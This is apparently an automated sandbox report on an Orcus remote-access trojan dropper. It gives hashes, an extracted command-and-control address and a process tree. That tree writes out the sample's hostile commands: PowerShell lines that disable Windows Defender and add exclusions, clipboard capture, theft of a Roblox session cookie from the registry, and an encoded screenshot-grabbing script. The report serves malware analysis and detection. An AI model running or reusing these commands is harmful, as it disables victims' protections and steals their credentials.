Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-07-2024 01:03

General

  • Target

    55f106bbd70d6c8b9ecac24ca61fdd85499050acf1973af1a74c39751dca86a9.exe

  • Size

    32.2MB

  • MD5

    50cf2b79a37b6c5e2d8648483487dd60

  • SHA1

    d95fec832f5cc5059d19e626c4eb7c9e526a6550

  • SHA256

    55f106bbd70d6c8b9ecac24ca61fdd85499050acf1973af1a74c39751dca86a9

  • SHA512

    655d587159c4753f4b57a2e3be596f54ac58060473a52296c8e226c9e63cdb32ac5b32fedc3a910652b69bc871c3dcb951f86ec448470b7a6cea370c9925717e

  • SSDEEP

    786432:QHw1v9qnHFHK1CMzoyuBzC8N1YSRwouTtRLbyK:QCqnHFHcCyoy4zC01YSRQtR

Malware Config

Extracted

Family

orcus

Botnet

FunPay

C2

31.44.184.52:44657

Mutex

sudo_vm3jypee5e4wpgyaqsjreb4akskikm0b

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %appdata%\privategamebase\Discord.exe

  • reconnect_delay

    10000

  • registry_keyname

    Sudik

  • taskscheduler_taskname

    sudik

  • watchdog_path

    AppData\aga.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus main payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Orcurs Rat Executable 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\55f106bbd70d6c8b9ecac24ca61fdd85499050acf1973af1a74c39751dca86a9.exe
    "C:\Users\Admin\AppData\Local\Temp\55f106bbd70d6c8b9ecac24ca61fdd85499050acf1973af1a74c39751dca86a9.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5052
    • C:\Users\Admin\AppData\Local\Temp\ExLoader_CA Classic.exe
      "C:\Users\Admin\AppData\Local\Temp\ExLoader_CA Classic.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetWindowsHookEx
        PID:4264
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3648
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2972
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2780
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4520
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2960
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2280
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4648
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            5⤵
              PID:3316
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4804
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              5⤵
                PID:4072
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3488
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4180
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:4084
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
              4⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:2084
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                5⤵
                • Views/modifies file attributes
                PID:1732
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3392
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:764
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              4⤵
                PID:4336
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:5036
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                  PID:3760
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    5⤵
                    • Enumerates processes with tasklist
                    PID:4756
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                  4⤵
                    PID:1016
                    • C:\Windows\System32\Wbem\WMIC.exe
                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      5⤵
                        PID:4528
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                      4⤵
                      • Clipboard Data
                      PID:1060
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        5⤵
                        • Clipboard Data
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3872
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      4⤵
                        PID:3284
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          5⤵
                          • Enumerates processes with tasklist
                          PID:3952
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        4⤵
                          PID:2460
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            5⤵
                              PID:3232
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "systeminfo"
                            4⤵
                              PID:3048
                              • C:\Windows\system32\systeminfo.exe
                                systeminfo
                                5⤵
                                • Gathers system information
                                PID:3700
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                              4⤵
                                PID:4716
                                • C:\Windows\system32\reg.exe
                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                  5⤵
                                    PID:4524
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                  4⤵
                                    PID:3984
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3392
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kmb5vk53\kmb5vk53.cmdline"
                                        6⤵
                                          PID:1980
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD65B.tmp" "c:\Users\Admin\AppData\Local\Temp\kmb5vk53\CSCC58DC7A474454CFC9DADE536CC9B2F0.TMP"
                                            7⤵
                                              PID:3308
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        4⤵
                                          PID:2836
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            5⤵
                                              PID:1272
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                            4⤵
                                              PID:2332
                                              • C:\Windows\system32\attrib.exe
                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                5⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:2664
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              4⤵
                                                PID:1144
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  5⤵
                                                    PID:1324
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                  4⤵
                                                    PID:4000
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                      5⤵
                                                      • Drops file in Drivers directory
                                                      • Views/modifies file attributes
                                                      PID:1452
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    4⤵
                                                      PID:4948
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        5⤵
                                                          PID:4736
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                        4⤵
                                                          PID:528
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist /FO LIST
                                                            5⤵
                                                            • Enumerates processes with tasklist
                                                            PID:4080
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          4⤵
                                                            PID:4424
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              5⤵
                                                                PID:1628
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                              4⤵
                                                                PID:3460
                                                                • C:\Windows\system32\tree.com
                                                                  tree /A /F
                                                                  5⤵
                                                                    PID:2484
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  4⤵
                                                                    PID:1380
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      5⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:2772
                                                                  • C:\Windows\system32\cmd.exe
